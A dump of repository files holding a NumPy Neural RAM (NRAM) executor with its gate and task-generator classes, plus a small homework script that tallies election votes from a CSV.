"text": "# Standard\nfrom enum import Enum\n\n# Vendor\nimport numpy as np\n\n\nclass GateArity(Enum):\n\n # Gate arity\n CONST = 0\n UNARY = 1\n BINARY = 2\n\nclass Gate(object):\n \"\"\" Base class for Gate \"\"\"\n\n def __init__(self, arity) -> None:\n super(Gate, self).__init__()\n \n self.arity = arity\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n raise NotImplementedError()\n\n def __str__(self):\n return self.__class__.__name__\n"
},
{
"alpha_fraction": 0.5554496049880981,
"alphanum_fraction": 0.5624403953552246,
"avg_line_length": 37.85185241699219,
"blob_id": "8907db20d91907aff94673c8061e4ef195b444e6",
"content_id": "fe66413be0186d0fde186d4b5ca761b45a4db952",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3147,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 81,
"path": "/NRamContext.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom factories.TaskFactory import TaskFactory\n\n\nclass NRamContext(object):\n def __init__(self,\n batch_size: int,\n l_max_int: list,\n l_sequence_size: list,\n l_timesteps: list,\n task_type: str,\n gates: list,\n network: list,\n print_circuits: str,\n print_memories: bool,\n path_config_file: str,\n info_is_active: bool,\n process_pool: int,\n stop_at_the_will: bool) -> None:\n self.gates = gates\n self.num_regs = len(network[0][0])\n self.num_hidden_layers = len(network[0:len(network) - 1])\n self.network = self.mlp_params(network, self.gates)\n\n self.batch_size = batch_size\n self.l_max_int = l_max_int\n self.l_sequence_size = l_sequence_size\n self.l_timesteps = l_timesteps\n self.tasks = list()\n for max_int, sequence_size, timesteps in zip(self.l_max_int, self.l_sequence_size, self.l_timesteps):\n self.tasks.append(\n TaskFactory.create(task_type, self.batch_size, max_int, self.num_regs, timesteps, sequence_size))\n\n # Every entry of the debug list is associated to a sample\n self.info_is_active = info_is_active\n\n # If None then the circuits will be not draw\n self.print_circuits = print_circuits\n\n self.print_memories = print_memories\n\n self.path_config_file = path_config_file\n\n self.process_pool = process_pool\n\n self.stop_at_the_will = stop_at_the_will\n\n def mlp_params(self, network: list, gates_list: list) -> list:\n # Hidden layers (Not output)\n layers = []\n for idx, l in enumerate(network[:-1]):\n layers.append(np.array(l[0], dtype=np.float32)) # Weights\n layers.append(np.array(l[1], dtype=np.float32)) # Bias\n\n # Output layers (for every gate coefficient)\n ptr = 0\n output_layer = network[-1]\n output_layer_weights = np.array(output_layer[0], dtype=np.float32)\n output_layer_bias = np.array(output_layer[1], dtype=np.float32)\n num_registers = self.num_regs\n for idx, g in enumerate(gates_list):\n for _ in range(g.arity):\n layers.append(output_layer_weights[:, ptr:ptr + num_registers]) # Weights\n layers.append(output_layer_bias[:, ptr:ptr + num_registers]) # Bias\n ptr += num_registers\n num_registers += 1\n\n # Output layers (for every register coefficient)\n for r in range(self.num_regs):\n layers.append(output_layer_weights[:, ptr:ptr + num_registers]) # Weights\n layers.append(output_layer_bias[:, ptr:ptr + num_registers]) # Bias\n ptr += num_registers\n\n # Output layer for the willingness of finish f_t\n layers.append(output_layer_weights[:, ptr:ptr + 1])\n layers.append(output_layer_bias[:, ptr:ptr + 1])\n\n return layers\n"
},
{
"alpha_fraction": 0.6035714149475098,
"alphanum_fraction": 0.625,
"avg_line_length": 36.33333206176758,
"blob_id": "9b76060a2954e01e181efb2fe286a589ecbd4ad1",
"content_id": "0992bcd097a75dea9074536e208eb44b794ad836",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 15,
"path": "/gates/Write.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import tensordot, transpose, zeros_like, ones_like\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass Write(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n erase = tensordot(transpose(ones_like(A) - A, axes=[1, 0]), ones_like(A), axes=1)\n contrib = tensordot(transpose(A, axes=[1, 0]), B, axes=1)\n new_mem = (erase * M) + contrib\n return new_mem, np.array([[1 if idx == 0 else 0 for idx in np.arange(A.shape[1])]], dtype=np.float64)\n"
},
{
"alpha_fraction": 0.8450704216957092,
"alphanum_fraction": 0.8450704216957092,
"avg_line_length": 35,
"blob_id": "7f9f10276f4feebf460dde953c2fd0e657092656",
"content_id": "02c1f5da2c74c8fb2305649938769720930924a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 2,
"path": "/__init__.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "from util import to_one_hot, encode\nfrom NRamContext import NRamContext"
},
{
"alpha_fraction": 0.5723404288291931,
"alphanum_fraction": 0.5914893746376038,
"avg_line_length": 30.33333396911621,
"blob_id": "6ac11928258e60c715ccc543d29359db72be27ce",
"content_id": "dcc4053ed1e7cf7977dfa0d87dee5359a6ced6f0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 470,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 15,
"path": "/gates/Add.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import tensordot, roll, transpose, stack\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass Add(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n rows = [roll(B[:, ::-1], shift=shift + 1, axis=1)\n for shift in range(M.shape[1])]\n B_prime = transpose(stack(rows, axis=1), axes=[0, 2, 1])\n return M, tensordot(A, B_prime, axes=2)[None, ...]\n"
},
{
"alpha_fraction": 0.5910418629646301,
"alphanum_fraction": 0.6085686683654785,
"avg_line_length": 35.67856979370117,
"blob_id": "5e3c1eae697b2a6e65bcf1487215ba0737f8bc2e",
"content_id": "45ec15ca35ba78217f48de73af0a55fcfd1221fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1027,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 28,
"path": "/tasks/TaskAccess.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskAccess(Task):\n \"\"\" [Access]\n Given a value k and an array A, return A[k]. Input is given as k, A[0], .., A[n - 1], NULL\n and the network should replace the first memory cell with A[k].\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n if self.sequence_size + 2 != self.max_int:\n raise Exception(\"Incompatible size of Max Int and input sequence.\")\n init_mem = np.random.randint(0, self.max_int, size=(self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 0] = np.random.randint(1, self.max_int - 1, size=(self.batch_size), dtype=np.int32)\n init_mem[:, self.max_int - 1] = 0\n\n out_mem = init_mem.copy()\n for sample, idx in enumerate(init_mem[:, 0]):\n out_mem[sample, 0] = init_mem[sample, idx]\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, 0] = 1\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.600375235080719,
"alphanum_fraction": 0.6172608137130737,
"avg_line_length": 37.07143020629883,
"blob_id": "9ef065fe934dc629a9564ce5c3bca73578bae6ca",
"content_id": "662fe2b7b47b131a1fe510647e3d0fe4fb632b4c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1070,
"license_type": "permissive",
"max_line_length": 153,
"num_lines": 28,
"path": "/tasks/TaskIncrement.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskIncrement(Task):\n \"\"\" [Increment]\n Given an array A, increment all its elements by 1. Input is given as\n A[0], ..., A[n − 1], NULL and the expected output is A[0] + 1, ..., A[n − 1] + 1.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n \"\"\"Task 5: Increment\"\"\"\n input_sequence_size = min(self.sequence_size, self.max_int - 1)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, :input_sequence_size] = \\\n np.random.randint(1, self.max_int, size=(self.batch_size, input_sequence_size), dtype=np.int32)\n\n out_mem = init_mem.copy()\n out_mem[:, :min(self.timesteps, input_sequence_size)] = np.mod(np.add(init_mem[:, :min(self.timesteps, input_sequence_size)], [1]), self.max_int)\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, 0:min(self.timesteps, input_sequence_size)] = 1\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.5478261113166809,
"alphanum_fraction": 0.5710144639015198,
"avg_line_length": 22.066667556762695,
"blob_id": "614cf6ea4e2cbb3fa10eacb65bb9d40533b8bfd6",
"content_id": "7415ae17100f98772d4594d4eca0eb0bc2bde332",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 15,
"path": "/gates/EqualThan.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\nfrom numpy import zeros_like\n\n# Project\nfrom gates.Gate import Gate\n\n\nclass EqualThan(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n Z = zeros_like(A)\n Z[0, 1] = np.tensordot(A, B, axes=2)\n Z[0, 0] = (1 - Z[0, 1])\n return M, Z"
},
{
"alpha_fraction": 0.5949417948722839,
"alphanum_fraction": 0.6105981469154358,
"avg_line_length": 48.81999969482422,
"blob_id": "0a6d4a1ddd617913fc857e7f92499b200faabe80",
"content_id": "fd5209a9021536348781ed1e60024125e6a61e4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2491,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 50,
"path": "/tasks/TaskListK.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\nclass TaskListK(Task):\n \"\"\" [ListK]\n Given a pointer to the head of a linked list and a number k, find the value of the\n k-th element on the list. List nodes are represented as two adjacent memory cells: a pointer\n to the next node and a value. Elements are in random locations in the memory, so that\n the network needs to follow the pointers to find the correct element. Input is given as:\n head, k, out, ... where head is a pointer to the first node on the list, k indicates how many\n hops are needed and out is a cell where the output should be put.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n list_size = int((self.max_int - 4) / 2)\n hops = np.random.randint(0, list_size, size=(self.batch_size))\n list_elements = np.random.randint(0, self.max_int, size=(self.batch_size, list_size))\n lists_elements_permutations = np.stack([np.random.permutation(list_size) for _ in range(self.batch_size)], axis=0)\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n\n # Create for each example the list\n for example in range(self.batch_size):\n for j, permidx in enumerate(lists_elements_permutations[example]):\n next_element_pointer = np.where(lists_elements_permutations[example] == permidx + 1)[0]\n if permidx == 0: # If the node is the first than set the pointer in the first memory position\n init_mem[example, 0] = 3 + 2 * j\n\n init_mem[example, 3 + (2 * j)] = \\\n -1.0 if len(next_element_pointer) == 0 else 3 + (2 * next_element_pointer[0]) # Set the pointer to the next list node\n init_mem[example, 3 + (2 * j) + 1] = list_elements[example, j] # Set the value of the list node\n init_mem[:, 2] = 2\n init_mem[:, 1] = hops\n init_mem[:, -1] = -1\n\n out_mem = init_mem.copy()\n for example in range(self.batch_size):\n output_value = -1.0\n pointer = out_mem[example, 0]\n for hop in range(out_mem[example, 1] + 1):\n output_value = out_mem[example, pointer + 1]\n pointer = out_mem[example, pointer]\n out_mem[example, out_mem[example, 2]] = output_value\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, 2] = 1\n\n return init_mem, out_mem, cost_mask\n"
},
{
"alpha_fraction": 0.550561785697937,
"alphanum_fraction": 0.550561785697937,
"avg_line_length": 15.6875,
"blob_id": "f466d522301567e0c714e2549453812eebeb4573",
"content_id": "bc27187b1d9e915442225f68110379f59b67ba4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 267,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 16,
"path": "/App.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Project\nfrom Singleton import Singleton\n\n\nclass App(metaclass=Singleton):\n\n _conf = {\n \"images_path\": \"./images/\"\n }\n\n @staticmethod\n def get(name):\n try:\n return App._conf[name]\n except KeyError:\n return None\n"
},
{
"alpha_fraction": 0.5573248267173767,
"alphanum_fraction": 0.56263267993927,
"avg_line_length": 27.57575798034668,
"blob_id": "6f74ba06a0ab3f040e74abf2d52855dd94aa2c16",
"content_id": "661393d4ac889451bb39a892f1e4f9a26ba47800",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 942,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 33,
"path": "/tasks/Task.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom util import encode\n\nclass Task(object):\n \"\"\" Base class for all task of NRAM \"\"\"\n\n def __init__(self, batch_size: int, max_int: int, num_regs: int, timestep: int, sequence_size: int) -> None:\n self.batch_size = batch_size\n self.max_int = max_int\n self.sequence_size = sequence_size\n self.num_regs = num_regs\n self.timesteps = timestep\n\n def __call__(self, *args, **kwargs):\n in_mem, out_mem, error_mask = self.create()\n return encode(in_mem), \\\n out_mem, \\\n error_mask, \\\n self.init_regs(np.zeros((self.batch_size, self.num_regs, self.max_int), dtype=np.float32)), \\\n self.timesteps\n\n def __str__(self):\n return self.__class__.__name__\n\n def init_regs(self, regs):\n regs[:, :, 0] = 1.0\n return regs\n\n def create(self):\n raise NotImplementedError()"
},
{
"alpha_fraction": 0.581818163394928,
"alphanum_fraction": 0.5977272987365723,
"avg_line_length": 35.66666793823242,
"blob_id": "4c2ebff63522469077823f2964ffa073c77342c3",
"content_id": "efb1b3c431a17a275e54d9661c24c3508e266e62",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 12,
"path": "/gates/Sub.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom numpy import tensordot, roll, transpose, stack\nfrom gates.Gate import Gate\n\nclass Sub(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n rows = [roll(B[:], shift=shift, axis=1)\n for shift in range(M.shape[1])]\n B_prime = transpose(stack(rows, axis=1), axes=[0, 2, 1])\n return M, tensordot(A, B_prime, axes=2)[None, ...]\n"
},
{
"alpha_fraction": 0.5913891196250916,
"alphanum_fraction": 0.611697793006897,
"avg_line_length": 38.709678649902344,
"blob_id": "f3553f3ee459596136f42c69e8274a4bdb315284",
"content_id": "a80533e3e01b7d07957f5ff5aa98787e7292c552",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1239,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 31,
"path": "/tasks/TaskReverse.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskReverse(Task):\n \"\"\" [Reverse]\n Given an array and a pointer to the destination, copy all elements from the array\n\tin reversed order. Input is given as p, A[0], ..., A[n − 1] where p points one element after\n A[n−1]. The expected output is A[n−1], ..., A[0] at positions p, ..., p+n−1 respectively.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n remaining_size = int(self.max_int - 2)\n vector_size = min(int(remaining_size / 2), self.sequence_size)\n starting_point = int(np.floor(self.max_int / 2))\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n init_mem[:, 0] = starting_point\n init_mem[:, 1:1 + vector_size] = \\\n np.random.randint(1, self.max_int, size=(self.batch_size, vector_size), dtype=np.int32)\n\n out_mem = init_mem.copy()\n out_mem[:, -1 - vector_size: - 1] = np.flip(out_mem[:, 1:1 + vector_size], axis=1)\n\n error_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n error_mask[:, -1 - vector_size: - 1] = np.ones((self.batch_size, vector_size))\n\n return init_mem, out_mem, error_mask\n"
},
{
"alpha_fraction": 0.61834317445755,
"alphanum_fraction": 0.6301774978637695,
"avg_line_length": 27.25,
"blob_id": "0e5e0b73c6523dbba86bb3d4cdfc9735e7476e5c",
"content_id": "8301e4a5dc2f495d81ef1884b6911c68608df14b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 338,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 12,
"path": "/gates/Max.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom gates.Gate import Gate, GateArity\nfrom gates.LessThan import LessThan\n\nclass Max(Gate):\n\n def __call__(self, M: np.array, A: np.array = None, B: np.array = None) -> (np.array, np.array):\n _, Z = LessThan(GateArity.BINARY.value)(M, A, B)\n return M, A if Z[0, 0] > Z[0, 1] else B"
},
{
"alpha_fraction": 0.5667752623558044,
"alphanum_fraction": 0.5845096111297607,
"avg_line_length": 33.54999923706055,
"blob_id": "e73aca98eab4462c38dc2aa80e33ed63b33ab622",
"content_id": "4f629c36271bcadaa37bde3edabddc19efa6ea38",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2763,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 80,
"path": "/util.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Standard\nimport os\nimport shutil\n\n# Vendor\nimport matplotlib as mpl\nmpl.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef to_one_hot(val, shape: int = None) -> np.ndarray:\n\n def to_one_hot_array(val: np.ndarray) -> np.ndarray:\n b = np.zeros((val.shape[0], val.shape[0]), dtype=np.float32)\n b[np.arange(val.shape[0]), val] = 1\n return b\n\n def to_one_hot_number(val: int, shape: int) -> np.ndarray:\n b = np.zeros((shape), dtype=np.float32)\n b[val] = 1\n return b\n\n return to_one_hot_array(val) if shape is None else to_one_hot_number(val, shape)\n\n\ndef encode(M: np.array) -> np.ndarray:\n \"\"\" Make the fuzzy version of a list of integer memories \"\"\"\n return np.stack([to_one_hot(s) for s in M], axis=0)\n\n\ndef create_dir(path: str, flush: bool = False) -> None:\n if not os.path.exists(path):\n os.mkdir(path, 0o755)\n\n if flush:\n for fd in os.listdir(path):\n file_path = os.path.join(path, fd)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef print_memories(M: np.ndarray, desired_mem: np.ndarray, cost_mask: np.ndarray, path: str, test_idx: int) -> bool:\n \"\"\" Print the memories of the samples \"\"\"\n int_M = M.argmax(axis=2)\n c = 0 # See paper Pag. 7, Sub section 4.2 Tasks\n m = np.sum(cost_mask) # See paper Pag. 7, Sub section 4.2 Tasks\n one_hot_mem = np.zeros((desired_mem.shape[0], desired_mem.shape[1]), dtype=np.int)\n\n for sample in range(desired_mem.shape[0]):\n for col in range(desired_mem.shape[1]):\n if desired_mem[sample, col] == int_M[sample, col]:\n one_hot_mem[sample, col] = 1\n if cost_mask[0, col] == 1:\n c += 1\n perc_correct = c / m\n with open(\"%s/tests-results.csv\" % os.path.abspath(os.path.join(path, os.pardir)), \"a+\") as f:\n f.write(\"%d,%f\\n\" % (np.sum(cost_mask[0]), 1 - perc_correct))\n\n fig = plt.figure()\n fig.suptitle('Correct: %f, Error: %f' % (perc_correct, (1 - perc_correct)), fontsize=14)\n\n plt.imshow(one_hot_mem, cmap=\"gray\", vmin=0.0, vmax=1.0)\n plt.savefig(\"%s/%d.memories.grey.png\" % (path, test_idx))\n\n differences_mem = np.zeros(\n (desired_mem.shape[0], desired_mem.shape[1]), dtype=np.float32)\n for s in range(desired_mem.shape[0]):\n for c in range(desired_mem.shape[1]):\n differences_mem[s, c] = M[s, c, desired_mem[s, c]]\n\n plt.imshow(differences_mem, cmap=\"Blues\", vmin=0.0, vmax=1.0)\n plt.savefig(\"%s/%d.memories.blues.png\" % (path, test_idx))\n\n return True"
},
{
"alpha_fraction": 0.5930656790733337,
"alphanum_fraction": 0.6113138794898987,
"avg_line_length": 41.153846740722656,
"blob_id": "82aa9116672f496eb72cda2a960ee7b009bbaf46",
"content_id": "4fc1213676c3f90f7f38a069700090ca51b6275a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1648,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 39,
"path": "/tasks/TaskProduct.py",
"repo_name": "DrugoLebowski/denn-lite-nram-executor",
"src_encoding": "UTF-8",
"text": "# Vendor\nimport numpy as np\n\n# Project\nfrom tasks.Task import Task\n\n\nclass TaskProduct(Task):\n \"\"\" [Product]\n Given pointers to 2 arrays A and B, and the pointer to the output o,\n sum the two arrays into one array. The input is given as:\n a, b, o, A[0], .., A[n − 1], G, B[0], ..., B[m − 1], G,\n where G is a special guardian value, a and b point to the first\n elements of arrays A and B respectively, and o is a slot for the output.\n \"\"\"\n\n def create(self) -> (np.ndarray, np.ndarray, np.ndarray):\n offset = 3\n remaining_size = int(self.max_int - 5)\n arrays_memory_size = int(remaining_size / 2)\n\n init_mem = np.zeros((self.batch_size, self.max_int), dtype=np.int32)\n list_elements_a = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n list_elements_b = np.random.randint(1, self.max_int, size=(self.batch_size, arrays_memory_size), dtype=np.int32)\n prod_a_b = np.mod(np.sum(np.multiply(list_elements_a, list_elements_b), axis=1), self.max_int)\n\n init_mem[:, 0] = offset\n init_mem[:, 1] = offset + arrays_memory_size + 1\n init_mem[:, 2] = offset + (2 * arrays_memory_size) + 2\n init_mem[:, offset:(offset + arrays_memory_size)] = list_elements_a\n init_mem[:, (offset + arrays_memory_size + 1):(offset + (2 * arrays_memory_size + 1))] = list_elements_b\n\n out_mem = init_mem.copy()\n out_mem[:, offset - 1] = prod_a_b\n\n cost_mask = np.zeros((self.batch_size, self.max_int), dtype=np.int8)\n cost_mask[:, offset - 1] = 1\n\n return init_mem, out_mem, cost_mask\n"
}
] | 34 |
bmuchemi/NewsAPI
|
https://github.com/bmuchemi/NewsAPI
|
a8cd9986734a898fcfeec084a6dfe517babf4080
|
b82d89fe7cc29fd27b5517b58a1f5b4a240c4b21
|
0c6da5b7292f40865f5bb4bcac31f61a815ca70c
|
refs/heads/master
| 2023-07-09T00:16:25.644381 | 2021-08-10T06:00:08 | 2021-08-10T06:00:08 | 394,534,579 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7620818018913269,
"alphanum_fraction": 0.7620818018913269,
"avg_line_length": 21.41666603088379,
"blob_id": "9c581076c52c9df630320acc42189c782e90d26d",
"content_id": "1691206d9a8ad697b86592c9bc25877ba35596d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 12,
"path": "/app/request.py",
"repo_name": "bmuchemi/NewsAPI",
"src_encoding": "UTF-8",
"text": "from app import app\nimport urllib.request,json\nfrom .models import sources,articles\n\nSources = sources.Sources\nArticles = articles.Articles\n\n# Getting api key\napi_key = app.config['NEWS_API_KEY']\n\n# Getting the movie base url\nbase_url = app.config[\"NEWS_API_BASE_URL\"]\n"
},
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.5652173757553101,
"avg_line_length": 22,
"blob_id": "b9d5b7e37d9afd6e951a6c755c0738c699e3d6fa",
"content_id": "cd5ed1b9a289119a6a64e5787e8e05b166969023",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 1,
"path": "/instance/config.py",
"repo_name": "bmuchemi/NewsAPI",
"src_encoding": "UTF-8",
"text": "NEWS_API_KEY = 'b6f5cab23a514902a53ba60e0a0b09f8'\n"
},
{
"alpha_fraction": 0.6804407835006714,
"alphanum_fraction": 0.6804407835006714,
"avg_line_length": 21.6875,
"blob_id": "b3c45d1c4cfb278868f7a208988159d8251efacd",
"content_id": "0179f03cc277bda740daced5a6cf630c49f7e15b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 363,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 16,
"path": "/app/views.py",
"repo_name": "bmuchemi/NewsAPI",
"src_encoding": "UTF-8",
"text": "from flask import render_template\nfrom app import app\nfrom .request import get_data\n\n# Views\[email protected]('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n\n popular_news = get_data()\n print(popular_news)\n title = 'NEWSROOM'\n return render_template('index.html', title = title,popular=popular_news)\n"
}
] | 3 |
samoor64/Python_HW_Bank_Poll
|
https://github.com/samoor64/Python_HW_Bank_Poll
|
4ab2d0837cd3f01041a158967107df80cbb8998b
|
1c672559b691994cff7e3a294ff2b30235153084
|
96fc00fa9e86fb01a40f4f9e43a7fed5c484c939
|
refs/heads/master
| 2020-03-23T06:55:03.927437 | 2018-07-17T05:44:09 | 2018-07-17T05:44:09 | 141,237,033 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 15,
"blob_id": "a66e43f1c2367a77f4476c6d6347c9221b798eb3",
"content_id": "9ccf57bf6a282f74e5a0660c4bf7b98f536d9ea2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "samoor64/Python_HW_Bank_Poll",
"src_encoding": "UTF-8",
"text": "# Python_HW_Bank_Poll\nPython HW\n"
},
{
"alpha_fraction": 0.5146506428718567,
"alphanum_fraction": 0.5251690745353699,
"avg_line_length": 34.02702713012695,
"blob_id": "dc9aa5a6db90fc7d28081a2f4f74e927eb3cd5a2",
"content_id": "4ed3319d78da36229dafddb167bbb9b2300475d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1331,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 37,
"path": "/Poll_HW.py",
"repo_name": "samoor64/Python_HW_Bank_Poll",
"src_encoding": "UTF-8",
"text": "import os\r\nimport csv\r\n\r\n#Set Path\r\ncsvpathh = os.path.join(\"Resources\", \"election_data.csv\")\r\n\r\n#Open CSV \r\nwith open(csvpathh, 'r') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=\",\")\r\n csv_header = next(csvreader)\r\n\r\n total_votes = 0\r\n votes_khan = 0\r\n voter_correy = 0\r\n voter_li = 0\r\n voter_otooley = 0\r\n for row in csvreader:\r\n total_votes += 1\r\n if row[2] == \"Khan\":\r\n votes_khan += 1\r\n if row[2] == \"Correy\":\r\n voter_correy += 1\r\n if row[2] == \"Li\":\r\n voter_li += 1\r\n if row[2] == \"O'Tooley\":\r\n voter_otooley += 1\r\n winner = {\"Khan\": int(votes_khan), \"Correy\": int(voter_correy), \"Li\": int(voter_li), \"OTooley\": int(voter_otooley)}\r\n print(\"Election Results\")\r\n print(\"-------------------------\")\r\n print(\"Total Votes: \" + str(total_votes))\r\n print(\"-------------------------\")\r\n print(\"Khan: \" + str(votes_khan) + str(int(votes_khan)/int(total_votes)))\r\n print(\"Correy: \" + str(voter_correy) + str(int(voter_correy)/int(total_votes)))\r\n print(\"Li: \" + str(voter_li) + str(int(voter_li)/int(total_votes)))\r\n print(\"O'Tooley: \" + str(voter_otooley) + str(int(voter_otooley)/int(total_votes)))\r\n print(\"-------------------------\")\r\n print(\"Winner: \" + max(winner, key=winner.get))"
},
{
"alpha_fraction": 0.5917843580245972,
"alphanum_fraction": 0.5988446474075317,
"avg_line_length": 31.191490173339844,
"blob_id": "6fff2f35654d2d44d79dab15f2c183bb319edd44",
"content_id": "df918b795d8919550e58f602c74bc07c56e24008",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1558,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 47,
"path": "/PY_HW.py",
"repo_name": "samoor64/Python_HW_Bank_Poll",
"src_encoding": "UTF-8",
